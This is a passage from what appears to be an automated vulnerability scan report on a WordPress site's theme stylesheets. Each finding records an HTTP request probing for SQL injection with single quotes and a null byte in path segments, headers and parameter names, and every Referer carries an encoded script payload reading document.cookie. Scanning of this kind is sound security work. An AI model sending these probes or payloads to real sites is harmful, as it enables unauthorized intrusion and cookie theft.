Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:16:39 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:16:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.32. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/css'/template.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:02 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.33. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/css/template.css' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:14 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.34. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/css/template.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:14:56 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:14:57 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.35. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/template.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/css/template.css?1'=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:14:34 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:14:34 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.36. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

Request

GET /wp-content'/themes/rt_mynxx_wp/css/typography.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:08 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:09 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.37. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

Request

GET /wp-content/themes'/rt_mynxx_wp/css/typography.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.38. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp'/css/typography.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:13 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.39. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/css'/typography.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:24 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.40. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/css/typography.css' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:27 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.41. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/css/typography.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:48 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:49 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.42. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/css/typography.css?1'=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:44 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:45 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.43. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

Request

GET /wp-content'/themes/rt_mynxx_wp/css/wp.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:59 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.44. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

Request

GET /wp-content/themes'/rt_mynxx_wp/css/wp.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:02 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.45. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp'/css/wp.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:08 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:09 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.46. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.installsoftware.com
Path:	/wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

Request

GET /wp-content/themes/rt_mynxx_wp/css'/wp.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44298

